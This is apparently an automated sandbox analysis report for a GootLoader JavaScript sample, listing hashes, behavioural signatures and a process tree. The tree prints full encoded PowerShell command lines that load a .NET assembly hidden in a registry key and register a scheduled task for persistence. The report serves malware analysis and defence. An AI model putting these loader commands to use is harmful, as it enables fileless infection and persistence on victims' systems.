f31d51425b9807e4892b1fc2ad11b74cc7e239ad245391cc15a420fa76b5df77

General

Target

gootloader_payload.js
Size

507KB
MD5

4f2e8764725736b8e66ec082daa359b7
SHA1

2fead06c9abcd6d33ad962a523a16e49c99d79b7
SHA256

f31d51425b9807e4892b1fc2ad11b74cc7e239ad245391cc15a420fa76b5df77
SHA512

08b5f768e50da661a3baab1038856cceb42fee6dfcc0e13cf94e7b018d1e52216a832354bd10a62f0eec7f505dc62fce0f2dc7bb8b401a19ddbd3c3a6a21fad8
SSDEEP

6144:7B/q31tPBSE4KQiNFkYpNkX8Y2pNKSh/U40eBrmxOn/eh7iuB+:7w1tJSE4viNFkYpNkMt3Z/eheuB+

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2044	powershell.exe
2020	powershell.exe
1528	powershell.exe
836	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1880 wrote to memory of 2020	1880	wscript.exe	28
PID 1880 wrote to memory of 2020	1880	wscript.exe	28
PID 1880 wrote to memory of 2020	1880	wscript.exe	28
PID 1880 wrote to memory of 2044	1880	wscript.exe	30
PID 1880 wrote to memory of 2044	1880	wscript.exe	30
PID 1880 wrote to memory of 2044	1880	wscript.exe	30
PID 2044 wrote to memory of 836	2044	powershell.exe	32
PID 2044 wrote to memory of 836	2044	powershell.exe	32
PID 2044 wrote to memory of 836	2044	powershell.exe	32
PID 2044 wrote to memory of 836	2044	powershell.exe	32
PID 2020 wrote to memory of 1528	2020	powershell.exe	33
PID 2020 wrote to memory of 1528	2020	powershell.exe	33
PID 2020 wrote to memory of 1528	2020	powershell.exe	33
PID 2020 wrote to memory of 1528	2020	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader_payload.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" OAA3ADM"A"OQA2ADkA"MQA1ADUA"O"w"BzAGw"A"ZQ"Bl"AHA"AIAAt"AHMAIAA4"A"D"MAO"wAkAHIAY"w"A9AE"cAZ"QB0AC0ASQ"B"0AGUAbQ"BQAHIAbwBwAGUA"c"g"B0A"Hk"A"I"AAtAHAA"YQB0AGgAIAA"oAC"IAa"AB"rACIAK"wA"iAGMA"dQA6AFw"AcwBv"AG"YAIgArACIAdAB3ACIAKwAiA"GEAcgBlAFwA"bQB"pA"GMA"IgA"rACIAcg"BvAH"M"AIgA"rA"C"IAb"wBmAHQAXABQ"AGg"AbwB"uAGUAXAAi"ACsA"WwBFAG4AdgB"pAHIAbw"Bu"A"G0AZQB"uAH"QAXQA6AD"oA"KAAiA"HU"Acw"B"l"A"CIAKwAiAHI"AbgA"iACsAIgBh"AG0AZQAiACkAK"wAiADAA"I"gAp"AD"sAZgB"vA"H"I"AIAAoACQAcgBjAHEAPQAwADsAJAByAGMAc"QAgAC0AbABlA"CAANwA"4A"D"kAOwAkA"HIAYwBxAC"sAKwApAHs"A"VA"ByAH"kAe"wAkAHYAegAr"AD0AJAByAGMALgAk"AHIAY"w"BxAH0AQwBhA"HQA"Y"wBoAHsAfQ"B9ADs"AJAByAGM"AcQ"A9ADAAO"w"B3AGgAaQ"BsAGUAKAAkA"H"QAc"gB1AGUAKQB7ACQAcgBjAHEAKw"ArADsAJABrAG8APQB"bAG0AYQB0AG"gAXQA"6"ADo"AKA"Ai"A"HMAcQAiACsAIgByAHQAIgApACgAJA"By"AGMAcQApADsAa"Q"BmAC"gAJABrAG8AIAAtAGUAcQ"AgAD"EAMAAwADAAKQB7AG"I"AcgBl"AGEA"awB9AH0AJA"Bl"AGUAPQAkAH"YAegAu"A"HIAZQB"wAG"w"A"YQ"BjAGUA"K"AA"i"A"CMAIgAsACQAaw"BvACkA"OwA"kAHEAc"wBiAD0AWw"BiAHkA"dAB"lAFsA"XQBdADoAOg"AoACIAb"g"BlA"CIAKwAiAHc"AIg"ApACg"AJABlAGUALgBM"AGUAbgBnAHQ"AaA"AvADIA"KQA7"AGY"AbwByACg"A"JAB"yAG"MAc"QA9A"DAAOwAk"AHI"A"YwBx"ACAA"LQ"BsAHQAIAAkAGUA"ZQAuA"EwAZ"QB"u"AGcAd"AB"oADs"AJA"ByAGMAcQArAD0AMgA"pAHsAJAB"xA"HMA"YgBbA"C"QAcgBjA"HE"ALw"Ay"AF0"APQBbA"GMAb"wB"uAHYAZQBy"AHQ"AXQA6ADo"AKAAiAFQA"bwBC"A"CI"AK"wAi"AHk"A"dAB"l"ACIAK"QA"oACQAZQBlAC4AUwB"1A"GIAc"wB0AHIAaQBuAGcAKAAkAHIAY"w"BxAC"wAMgAp"ACwA"KAAyACo"A"O"AApA"CkAfQBbA"HIAZQB"mAGw"AZQB"jAHQAaQBvAG4ALgB"hAHM"AcwBlA"G0"AYg"Bs"AHkA"XQ"A"6ADo"AKAAiAE"wAbwAiA"CsAIgBhAGQA"Ig"ApA"CgAJA"Bx"A"HMAYgA"pA"DsAWwBPAH"AAZQBuA"F0AOgA6AC"g"AIgBUAGUAIgArAC"IA"cwB0AC"IAKQAoA"CkAOwA3AD"gA"MwA5ADkANwAx"ADAANwA7AA="=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e OAA3ADMAOQA2ADkAMQA1ADUAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAHIAYwA9AEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAoACIAaABrACIAKwAiAGMAdQA6AFwAcwBvAGYAIgArACIAdAB3ACIAKwAiAGEAcgBlAFwAbQBpAGMAIgArACIAcgBvAHMAIgArACIAbwBmAHQAXABQAGgAbwBuAGUAXAAiACsAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAKAAiAHUAcwBlACIAKwAiAHIAbgAiACsAIgBhAG0AZQAiACkAKwAiADAAIgApADsAZgBvAHIAIAAoACQAcgBjAHEAPQAwADsAJAByAGMAcQAgAC0AbABlACAANwA4ADkAOwAkAHIAYwBxACsAKwApAHsAVAByAHkAewAkAHYAegArAD0AJAByAGMALgAkAHIAYwBxAH0AQwBhAHQAYwBoAHsAfQB9ADsAJAByAGMAcQA9ADAAOwB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7ACQAcgBjAHEAKwArADsAJABrAG8APQBbAG0AYQB0AGgAXQA6ADoAKAAiAHMAcQAiACsAIgByAHQAIgApACgAJAByAGMAcQApADsAaQBmACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7AGIAcgBlAGEAawB9AH0AJABlAGUAPQAkAHYAegAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAHEAcwBiAD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABlAGUALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJAByAGMAcQA9ADAAOwAkAHIAYwBxACAALQBsAHQAIAAkAGUAZQAuAEwAZQBuAGcAdABoADsAJAByAGMAcQArAD0AMgApAHsAJABxAHMAYgBbACQAcgBjAHEALwAyAF0APQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAFQAbwBCACIAKwAiAHkAdABlACIAKQAoACQAZQBlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHIAYwBxACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABxAHMAYgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADgAMwA5ADkANwAxADAANwA7AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" NgA5ADc"AMQAxADkA"O"QAwADgAOw"AkAG"UAZw"A9"A"Cg"AWwBE"AGkA"YQBnAG4AbwBzA"HQAaQBjA"HMALgBQAHIAbwBjA"GUAcwBz"AF0AOgA6AEcAZQB0"AEMAdQBy"AHIAZQBuA"H"Q"A"UAByA"G8A"YwBlAHMAcwAoACkALg"BNAGEAa"QBuA"E0Ab"wBkAH"UA"b"ABlA"C4ARgBp"AGwAZQBOA"G"EAbQBlACkAOwAk"AGc"AZQ"A9"ACIALQB3A"CAAaAAgAC"8AYw"AgAC"IAK"w"Ak"AG"UAZw"ArACIAIAAiA"CI"ALw"AiACIA"ZQAiAC"IAIABPAEE"AQQAzAEEARABNAEEATw"BRA"EEAMgBBAEQAa"wB"BAE0AU"QBBADE"AQQ"BEAFUAQQBPAHcAQgB"6AE"EARwB3AE"EA"WgBR"AEIAbABBAEgAQQBBAEkAQ"QB"B"AHQAQQBIAE0AQQBJAE"EAQQA0AEEARABNAEE"ATwB3"AEEAaw"BBA"EgASQ"BBAFkAd"w"BBADkAQQBFAGMAQQBaA"FEAQgA"w"AEEA"Q"wAwAEEAU"wBRAEIAMABB"A"EcAV"QB"BAG"IAU"QBCAF"EAQQBIAEk"AQQ"B"iAH"cA"QgB3AEE"AR"wBV"AEEAYwBnA"EIAMABBAEgAa"wBBAEkAQQ"BBAHQ"AQQBIAEEAQQBZAF"EAQgA"w"AE"EARw"BnAEEASQBBAEEAbwB"BAEMASQ"BB"AGEAQQ"BCA"HI"AQQ"BD"AEkAQ"QBLA"HcAQQBpAEEARwBNAE"EA"ZABRAEEANgBBAEYAdwBB"AGMAdwBCAHYAQQBH"AF"kAQQBJAGc"AQQByAEEAQ"wB"JAEEAZABB"AEIAM"wB"BAEM"A"S"QBB"AEsA"dwBBAGkAQQBHAE"UA"QQBjA"GcAQ"gBs"AE"EA"RgB3"AE"EAY"gBR"AE"IAcABB"AEc"ATQBBAEkAZ"wB"BAHIAQ"QB"D"AEk"AQQBjAGcAQgB2"AEEAS"A"BNAEEASQBnAE"EAc"g"BBAE"MASQBB"AG"IAdwBCAG0AQQBI"AFEAQQB"YAEEAQgBRAEEARwBn"AEEAYgB3"AEI"AdQB"BAEcAVQBBA"FgAQ"QB"BA"GkAQQBD"AHMAQQ"BXAH"cAQgBG"AE"EA"RwA0"AEEAZA"BnAE"IAc"ABBAEgASQBBAGIAdwB"CAH"UA"QQBH"A"DAAQQBa"AFEAQg"B"1AEE"ASAB"R"AEEAW"ABR"AE"E"ANgBBAEQAbwBB"AEsAQQBBAG"kAQQBI"AF"UA"QQ"BjAHcA"QgBsA"EE"AQw"B"JA"E"EASwB"3AEEAaQBB"A"E"g"ASQBBAGI"AZwBB"AGkAQQBDAHM"AQQB"JAGcAQgBoAE"EA"R"wAwAEEAWgBRAEEAaQB"BAEMAawBB"AEsAdw"BBAG"k"A"QQBEAEEAQQBJ"A"GcAQQB"w"AEEAR"A"BzAEEAWgB"n"AEIAdgBBAE"gASQBB"AEkA"QQ"BBA"G"8AQQBDAFEAQQBjAG"cAQg"BqAEEASABFAEEAUABRAE"EAd"w"BBAEQAcwBB"AE"oA"QQB"CAHk"AQQB"H"AE0AQ"QBjAFE"AQQB"n"AEEAQwAwAEE"AYgBBA"EI"A"bABBAEMA"QQBBAE"4AdwBBAD"QA"Q"QBEAGsAQQBPAHc"A"QQBrA"EEA"SA"BJA"EEAWQ"B3AE"IAeAB"BAEMAcw"BBAEsA"dwBBAHAAQQ"BI"AHMA"QQBW"AEE"AQ"gB"5AEEASABrA"EE"AZQ"B3AEEAa"wB"BAEgAWQB"BAGUAZw"BBA"HIA"Q"Q"B"EADAAQQBKAE"EAQgB"5AE"E"ARwBNAE"EA"TAB"nAEE"Aaw"BBA"EgASQB"BAF"kAdw"B"C"AH"gA"QQBIA"DAAQQB"RAH"c"A"QgBoAEEASABRAEEAWQB"3"AEIAb"wBB"AE"g"AcwBB"AGYAUQB"C"ADkAQQBEA"HMAQ"QBKAEEAQg"B5AE"EARw"BNAEE"AYwBRAEEAOQBB"AEQAQQBB"AE8Adw"BCA"D"M"AQQBH"A"GcAQQBhAFEAQgB"zAEEARwBVAEE"AS"wBBAEE"Aa"w"BBAEgAU"QBBAG"MAZ"w"BCAD"E"AQQBHAFUAQQBL"AFEAQ"gA3AEEAQwBRAEEA"YwBnAEIA"agBBAEgA"RQ"BBAE"s"AdwBB"AHIAQQB"EAHM"A"QQ"BK"AEEA"Q"gB"yAE"EAR"wA4AE"EAUABRAEIAYgBBAEcAMABBAFk"AU"QBCAD"AAQQBHAGcAQQBY"A"FEA"Q"QA2AEEARABvAEEASwBBA"EE"AaQ"BBAEgATQBBAGMAU"QB"BA"GkAQ"QBD"A"HM"AQQBJAGcAQ"g"B5A"E"E"ASABRAEEASQBnAEEAcABB"AEMAZ"wBBAEoAQQBCA"H"kAQ"QBHAE0AQQBjAFEA"QQBwAEEARABzAEEA"YQBRAEIAbQ"BBAE"MA"Z"wBBAE"oAQ"QBCAHIAQQBHADgA"Q"QBJAEEAQQB0A"EE"A"RwBVA"EEA"Y"wBRA"EEAZwBBAE"QA"RQBBAE0AQQBBAHcAQQBEAE"EAQ"QBLAFEAQ"gA"3A"EEARwBJAE"EAYwBn"AEIAbABBAE"cARQBBA"GEAdwB"CAD"kA"QQBIAD"AAQQBK"AEEAQgBsAEE"A"RwB"VAEEAU"ABR"AEEAaw"BBAEgA"W"QB"BAGUAZ"wBBAH"UAQQB"IAEk"AQQ"Ba"AFEAQgB3AEEA"R"wB3AEEAWQBRAEIA"agBB"AEcAVQBBAEs"A"Q"Q"BBAGkAQ"QBDAE0AQQ"BJA"GcAQQBzAEEAQwBRAE"EAYQB3"AEI"A"d"gBBAEMAawBBAE8"AdwBBAG"sA"Q"QB"IAEUA"QQBj"AHcAQgB"pA"EE"ARAAwA"EEAVwB3AEIAaQBB"AEgAa"wBBA"GQA"QQBCAG"wAQQ"BGAH"MA"QQ"BYAF"EAQ"gBkAEEARABvA"EEATwBnAE"EAbwBBAEM"ASQBB"AGI"A"ZwBCA"GwAQQBDAE"kAQ"QBL"AH"cAQQB"pAEEA"SABjAEEA"SQBnAEE"AcA"BBAEMAZwBB"AEoAQQ"BC"A"GwAQQBH"AFUAQ"QB"MAGcA"QgBNA"EE"AR"wBV"AEEAY"gB"nAEIAbgBBAE"gAUQ"BBAGEAQQBBAHYAQQ"BEAE"kAQQB"LAFEAQQA3AEEARwBZAE"EAY"gB3AE"IAeQBBAEMA"ZwB"BAEoAQQBCAHk"AQQBHAE0AQQBjAFEAQQ"A5AE"E"ARABBAEEATw"B3AE"EAawBB"AEgAS"QBBAF"kAdwBCAH"g"AQ"QBDAE"EAQQBMAF"EAQgB"z"AEEASA"BRAEE"ASQBBAEEAawBBA"EcAVQBB"AFoAUQ"BBA"H"UAQ"QBFA"Hc"AQQB"aA"FE"AQgB1A"EE"ARwB"j"AEEAZABBAE"IA"bwBB"AEQAc"wBB"A"Eo"AQQBC"AHkAQQBH"A"E0AQQB"jAFEAQQByAE"EA"R"AAwAEEA"TQBnAE"EAcABBAEgAcw"BBA"EoA"QQBCAH"gAQQB"IAE0AQQ"B"ZAGc"A"QgBi"A"EEAQw"BRAEEAYwBnAEIAa"gBBAEgARQBB"A"EwA"d"wBBA"H"kA"Q"Q"BGADAAQQBQAFEAQ"gBiA"EE"ARwBNAEEAYg"B"3AEIAdQBBAEgAWQBB"AFoAUQBCAHkA"Q"QBIAFE"AQQB"YAFEAQQ"A2AEEARABv"AEEASwBB"AEEA"aQBB"AEYAU"QBBA"GIAdwBC"AEMAQQBDA"EkAQ"QBLAHcAQQBp"AEE"ASA"BrAEEAZA"BBAE"IAbABBAEMASQBBAEsAU"QBBAG8AQQBDAFEA"Q"QBaAF"EAQgB"sAEEA"Q"wA0AEEAVQB3AEI"AMQBBAE"cASQBB"AGMAdw"BCADA"AQQB"IA"EkAQQ"BhAFEAQgB1"AEEARw"BjAEEASwBB"AEEAaw"BB"AE"gASQBBA"FkA"dwB"CAHgAQQBD"AHcAQQBNA"G"cAQQBwAEEA"QwB3AE"EA"S"w"BBAEEAeQBBAEM"AbwBB"AE8AQQ"B"BAHAAQ"QBDAGsAQQB"m"AFEAQgBiAEEA"SABJAEE"A"Wg"B"RAEIAbQ"BBAEc"Adw"BBAFoAUQBC"AGoAQQBIAFEA"Q"QBh"AFEA"Q"gB2AE"EARwA0AEEAT"AB"n"AEIAaABBAEgA"TQB"BAGMAdwBC"AGwA"QQBH"A"DA"AQQBZAGcAQgBz"AEE"A"SABrAEE"AWAB"RAEEANgBBAEQAbwBB"AE"s"A"QQ"BB"AG"kAQ"QBF"AHcAQQBiA"H"cAQ"QBp"AE"E"AQwB"zAEEASQ"BnAEI"A"aA"B"BAE"c"AUQBBAE"kAZwBBAHA"AQQBD"A"GcA"QQBKAEEA"QgB4AEEA"S"A"BN"AEE"AWQ"BnAEEAcABBA"EQAc"wBBAFcA"dwBCA"FA"AQQBIA"EEAQQBaAFEAQgB1AEEAR"gAw"AEEAT"wB"n"AEEANgBBAEM"A"Z"wBBAEkA"Zw"BC"AFUAQQBH"AFUAQQBJAGcAQQByAEEAQwBJAEEA"YwB3"AE"IAMABBAEM"AS"QBBAEsAUQBBAG8AQQBD"AGsAQ"Q"BPAHcAQQAzAEEARA"B"nA"EEATQB3AEE"ANQB"BAEQAawBBA"E4Adw"BB"AHgAQQB"EAE"EAQQBOAHc"AQQ"A3"AEEA"QQA"9"AD0AI"g"A7ACQAdgBsAHkAPQAk"AGUAbgB2"AD"oAVQBTAEUAU"gBOAE"E"ATQBFADsAUgBlAGcAaQ"BzAHQAZQB"yAC0AUwBjA"GgAZQBkAHU"AbABlAGQAVA"BhAHM"AawAgACQAdgBs"A"H"kAIAAt"AEkA"bgA"g"ACgATgB"lAHcALQ"BTAG"MAaA"BlAG"QAdQBsAGUAZABUAGEAcwB"r"ACA"AL"QBB"AGMAI"AAoAE4AZ"QB3A"C0AUwB"jAGgAZQBkA"HUAbABlAGQAVAB"hAHMAawBB"AGMA"dABpAG8"AbgA"gAC0ARQAgACQAZ"QBnA"C"AA"LQB"BAHIAIAAkAGcAZQA"pACA"AL"QB"U"AHIAIAAo"AE4A"ZQB3"AC0A"UwBjAGgAZQBk"AHUAbA"Bl"A"GQAVA"BhAH"MAa"wBUAHIAaQBn"AG"c"AZQByACA"ALQB"BA"HQAT"AAg"AC0"AVQAgA"C"Q"Ad"gBsAHk"AKQA"pADsAO"QAzADAAOAAzAD"M"A"MQ"A0AD"sA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e NgA5ADcAMQAxADkAOQAwADgAOwAkAGUAZwA9ACgAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkAOwAkAGcAZQA9ACIALQB3ACAAaAAgAC8AYwAgACIAKwAkAGUAZwArACIAIAAiACIALwAiACIAZQAiACIAIABPAEEAQQAzAEEARABNAEEATwBRAEEAMgBBAEQAawBBAE0AUQBBADEAQQBEAFUAQQBPAHcAQgB6AEEARwB3AEEAWgBRAEIAbABBAEgAQQBBAEkAQQBBAHQAQQBIAE0AQQBJAEEAQQA0AEEARABNAEEATwB3AEEAawBBAEgASQBBAFkAdwBBADkAQQBFAGMAQQBaAFEAQgAwAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAHQAQQBIAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbwBBAEMASQBBAGEAQQBCAHIAQQBDAEkAQQBLAHcAQQBpAEEARwBNAEEAZABRAEEANgBBAEYAdwBBAGMAdwBCAHYAQQBHAFkAQQBJAGcAQQByAEEAQwBJAEEAZABBAEIAMwBBAEMASQBBAEsAdwBBAGkAQQBHAEUAQQBjAGcAQgBsAEEARgB3AEEAYgBRAEIAcABBAEcATQBBAEkAZwBBAHIAQQBDAEkAQQBjAGcAQgB2AEEASABNAEEASQBnAEEAcgBBAEMASQBBAGIAdwBCAG0AQQBIAFEAQQBYAEEAQgBRAEEARwBnAEEAYgB3AEIAdQBBAEcAVQBBAFgAQQBBAGkAQQBDAHMAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAGIAdwBCAHUAQQBHADAAQQBaAFEAQgB1AEEASABRAEEAWABRAEEANgBBAEQAbwBBAEsAQQBBAGkAQQBIAFUAQQBjAHcAQgBsAEEAQwBJAEEASwB3AEEAaQBBAEgASQBBAGIAZwBBAGkAQQBDAHMAQQBJAGcAQgBoAEEARwAwAEEAWgBRAEEAaQBBAEMAawBBAEsAdwBBAGkAQQBEAEEAQQBJAGcAQQBwAEEARABzAEEAWgBnAEIAdgBBAEgASQBBAEkAQQBBAG8AQQBDAFEAQQBjAGcAQgBqAEEASABFAEEAUABRAEEAdwBBAEQAcwBBAEoAQQBCAHkAQQBHAE0AQQBjAFEAQQBnAEEAQwAwAEEAYgBBAEIAbABBAEMAQQBBAE4AdwBBADQAQQBEAGsAQQBPAHcAQQBrAEEASABJAEEAWQB3AEIAeABBAEMAcwBBAEsAdwBBAHAAQQBIAHMAQQBWAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgAWQBBAGUAZwBBAHIAQQBEADAAQQBKAEEAQgB5AEEARwBNAEEATABnAEEAawBBAEgASQBBAFkAdwBCAHgAQQBIADAAQQBRAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBCADkAQQBEAHMAQQBKAEEAQgB5AEEARwBNAEEAYwBRAEEAOQBBAEQAQQBBAE8AdwBCADMAQQBHAGcAQQBhAFEAQgBzAEEARwBVAEEASwBBAEEAawBBAEgAUQBBAGMAZwBCADEAQQBHAFUAQQBLAFEAQgA3AEEAQwBRAEEAYwBnAEIAagBBAEgARQBBAEsAdwBBAHIAQQBEAHMAQQBKAEEAQgByAEEARwA4AEEAUABRAEIAYgBBAEcAMABBAFkAUQBCADAAQQBHAGcAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEgATQBBAGMAUQBBAGkAQQBDAHMAQQBJAGcAQgB5AEEASABRAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAHkAQQBHAE0AQQBjAFEAQQBwAEEARABzAEEAYQBRAEIAbQBBAEMAZwBBAEoAQQBCAHIAQQBHADgAQQBJAEEAQQB0AEEARwBVAEEAYwBRAEEAZwBBAEQARQBBAE0AQQBBAHcAQQBEAEEAQQBLAFEAQgA3AEEARwBJAEEAYwBnAEIAbABBAEcARQBBAGEAdwBCADkAQQBIADAAQQBKAEEAQgBsAEEARwBVAEEAUABRAEEAawBBAEgAWQBBAGUAZwBBAHUAQQBIAEkAQQBaAFEAQgB3AEEARwB3AEEAWQBRAEIAagBBAEcAVQBBAEsAQQBBAGkAQQBDAE0AQQBJAGcAQQBzAEEAQwBRAEEAYQB3AEIAdgBBAEMAawBBAE8AdwBBAGsAQQBIAEUAQQBjAHcAQgBpAEEARAAwAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQBYAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAGIAZwBCAGwAQQBDAEkAQQBLAHcAQQBpAEEASABjAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAGwAQQBHAFUAQQBMAGcAQgBNAEEARwBVAEEAYgBnAEIAbgBBAEgAUQBBAGEAQQBBAHYAQQBEAEkAQQBLAFEAQQA3AEEARwBZAEEAYgB3AEIAeQBBAEMAZwBBAEoAQQBCAHkAQQBHAE0AQQBjAFEAQQA5AEEARABBAEEATwB3AEEAawBBAEgASQBBAFkAdwBCAHgAQQBDAEEAQQBMAFEAQgBzAEEASABRAEEASQBBAEEAawBBAEcAVQBBAFoAUQBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEQAcwBBAEoAQQBCAHkAQQBHAE0AQQBjAFEAQQByAEEARAAwAEEATQBnAEEAcABBAEgAcwBBAEoAQQBCAHgAQQBIAE0AQQBZAGcAQgBiAEEAQwBRAEEAYwBnAEIAagBBAEgARQBBAEwAdwBBAHkAQQBGADAAQQBQAFEAQgBiAEEARwBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEYAUQBBAGIAdwBCAEMAQQBDAEkAQQBLAHcAQQBpAEEASABrAEEAZABBAEIAbABBAEMASQBBAEsAUQBBAG8AQQBDAFEAQQBaAFEAQgBsAEEAQwA0AEEAVQB3AEIAMQBBAEcASQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASwBBAEEAawBBAEgASQBBAFkAdwBCAHgAQQBDAHcAQQBNAGcAQQBwAEEAQwB3AEEASwBBAEEAeQBBAEMAbwBBAE8AQQBBAHAAQQBDAGsAQQBmAFEAQgBiAEEASABJAEEAWgBRAEIAbQBBAEcAdwBBAFoAUQBCAGoAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEATABnAEIAaABBAEgATQBBAGMAdwBCAGwAQQBHADAAQQBZAGcAQgBzAEEASABrAEEAWABRAEEANgBBAEQAbwBBAEsAQQBBAGkAQQBFAHcAQQBiAHcAQQBpAEEAQwBzAEEASQBnAEIAaABBAEcAUQBBAEkAZwBBAHAAQQBDAGcAQQBKAEEAQgB4AEEASABNAEEAWQBnAEEAcABBAEQAcwBBAFcAdwBCAFAAQQBIAEEAQQBaAFEAQgB1AEEARgAwAEEATwBnAEEANgBBAEMAZwBBAEkAZwBCAFUAQQBHAFUAQQBJAGcAQQByAEEAQwBJAEEAYwB3AEIAMABBAEMASQBBAEsAUQBBAG8AQQBDAGsAQQBPAHcAQQAzAEEARABnAEEATQB3AEEANQBBAEQAawBBAE4AdwBBAHgAQQBEAEEAQQBOAHcAQQA3AEEAQQA9AD0AIgA7ACQAdgBsAHkAPQAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgACQAdgBsAHkAIAAtAEkAbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQAgACQAZQBnACAALQBBAHIAIAAkAGcAZQApACAALQBUAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATAAgAC0AVQAgACQAdgBsAHkAKQApADsAOQAzADAAOAAzADMAMQA0ADsA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
60c68bab009b0ffda2614b859a6dae70

SHA1
0074c1b6d653fed933bae910c65cdec473d3127f

SHA256
36976e13f5383644c21b87c64a33058e7782003d1cd1c15eb92da6ffd2093573

SHA512
6e5e10b13764f566b042d7f9c5ed258dac7a6252da79419dd86f67d494eb41001f63f0784ec5e7fffc67a8a1355d709fdcc8c97947e26ea2ed72190191591429

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6ff96ad822ab0cdd5f63b5b4c39a3848

SHA1
0922eb15eb26ed6481943bf8d52f77d06364f019

SHA256
bfd320a3079990b03a3328e7e4fe97f6e9a859c0ab5bfdb93cac1bf97c995e7b

SHA512
62a287ad609459773f58d1e07a76e69074b5a22816dbe5a292e9e81a83f2345e559c92d6ba033bbba98b3eb63f11127f6b48ecf369a7932db134d5c059edb7f3

Download Submit
